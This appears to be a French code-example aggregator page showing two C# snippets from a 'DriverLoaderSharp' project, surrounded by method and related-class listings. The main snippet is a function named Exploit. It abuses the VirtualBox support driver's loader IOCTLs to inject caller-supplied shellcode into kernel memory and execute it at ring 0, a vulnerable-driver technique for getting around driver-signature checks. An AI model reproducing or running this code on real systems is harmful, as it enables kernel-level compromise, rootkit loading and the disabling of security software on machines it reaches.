C# (CSharp) DriverLoaderSharp Natives Exemples

Langage de programmation: C# (CSharp)

Espace de nommage/Pack: DriverLoaderSharp

Class/Type: Natives

Exemples au hotexamples.com: 2

C# (CSharp) DriverLoaderSharp Natives - 2 exemples trouvés. Ce sont les exemples réels les mieux notés de DriverLoaderSharp.Natives extraits de projets open source. Vous pouvez noter les exemples pour nous aider à en améliorer la qualité.

Méthodes fréquemment utilisées

Afficher Cacher

OpenService(5)

CloseServiceHandle(5)

FindKernelProcedure(2)

QueryServiceStatus(2)

CTL_CODE(1)

CloseHandle(1)

ControlService(1)

CreateFile(1)

CreateService(1)

DeleteService(1)

DeviceIoControl(1)

GetProcAddress(1)

LoadLibrary(1)

OpenSCManagerW(1)

StartService(1)

Méthodes fréquemment utilisées

OpenService (5)

CloseServiceHandle (5)

FindKernelProcedure (2)

QueryServiceStatus (2)

CTL_CODE (1)

CloseHandle (1)

ControlService (1)

CreateFile (1)

CreateService (1)

DeleteService (1)

Méthodes fréquemment utilisées

DeviceIoControl (1)

GetProcAddress (1)

LoadLibrary (1)

OpenSCManagerW (1)

StartService (1)

Associées

ThirdPartyClient

BlogPostRepository

SettingsDialog

OpcClient

ExternalUrlsModel

FlowNode_ReqRankMatchReward.ReqType

DataArgs

PackageRestoreData

Tdps

Iform

Related in langs

Tx_Yag_Utility_Encoding (PHP)

shipme_replace_stuff_for_me (PHP)

VINAGRE_IS_BOOKMARKS_ENTRY (C++)

ECM (C++)

RandVector (Go)

Nil (Go)

PatIdTypeCollection (Java)

DroidGap (Java)

JSContext (Python)

has_no_effects (Python)

Exemple #1

0

Afficher le fichier

public static void Exploit(Byte[] shellcode, Int32 codeSize, Int32 dataOffset) { var connect = new ConnectIn { Header = new Header(BitConverter.ToUInt32(Encoding.Default.GetBytes("tori"), 0), 0, Marshal.SizeOf <ConnectIn>(), Marshal.SizeOf <ConnectOut>()) }; connect.RequestedVersion = 0; connect.InterfaceVersion = 0x00070002; Marshal.Copy(Encoding.Default.GetBytes("The Magic Word!").ToArray(), 0, new IntPtr(connect.MagicWord), 15); var cookie = Natives.DeviceIoControl <ConnectOut>(DeviceHandle, Connect, connect); if (cookie.Cookie == 0) { throw new Exception("Connect to VBox Failed"); } var ldrOp = new LdrOpIn { Header = Header.CreateHeader <LdrOpIn, LdrOpOut>(cookie), CodeSize = codeSize }; Marshal.Copy(Encoding.Default.GetBytes("shalzuth").ToArray(), 0, new IntPtr(ldrOp.NameTag), 8); var ldrOpOut = Natives.DeviceIoControl <LdrOpOut>(DeviceHandle, LoaderOpen, ldrOp); if (ldrOpOut.Header.Cookie == 0) { throw new Exception("Loader Open Failed"); } Console.WriteLine("ldrOpOut.ImageBase : " + ldrOpOut.ImageBase.ToString("X")); var imageBase = ldrOpOut.ImageBase; var ldrLd = new LdrLdIn { Header = Header.CreateHeader <LdrLdInWithPayload, Header>(cookie) }; ldrLd.EntryPointType = 1; //SUPLDRLOADEP_VMMR0 ldrLd.ImageBase = ldrLd.ModuleHandlerEntryEx = ldrLd.ModuleHandlerEntryFast = ldrLd.ModuleHandlerEntryInt = imageBase; ldrLd.ModuleHandler = 0x1a000; ldrLd.ImageSize = codeSize; var ldrLdWithPayload = new LdrLdInWithPayload { LdrLd = ldrLd }; Marshal.Copy(shellcode, 0, new IntPtr(ldrLdWithPayload.Payload), shellcode.Length); if (Natives.DeviceIoControl <Header>(DeviceHandle, LoaderLoad, ldrLdWithPayload).Cookie == 0) { throw new Exception("Loader Load Failed"); } var setVmForFast = new SetVMForFastIn { Header = Header.CreateHeader <SetVMForFastIn, Header>(cookie), Ring0VMPtr = 0x1a000 }; if (Natives.DeviceIoControl <Header>(DeviceHandle, SetVMForFast, setVmForFast).Cookie == 0) { throw new Exception("Set VM Failed"); } if (Natives.DeviceIoControl <UInt64>(DeviceHandle, FastDoNop, new NopIn()) != 0) { throw new Exception("Fast NOP Failed"); } Console.WriteLine("sys injected, freeing"); var ldrFree = new LdrFreeIn { Header = Header.CreateHeader <LdrFreeIn, Header>(cookie), ImageBase = imageBase }; if (Natives.DeviceIoControl <Header>(DeviceHandle, LoaderFree, ldrFree).Cookie == 0) { throw new Exception("Load Free Failed"); } }

Exemple #2

0

Afficher le fichier

public static Int32 IOCTL(Int32 Function) { return(Natives.CTL_CODE(Natives.FILE_DEVICE_UNKNOWN, (Function) | 0x80, Natives.CtlMethod.Buffered, 2)); }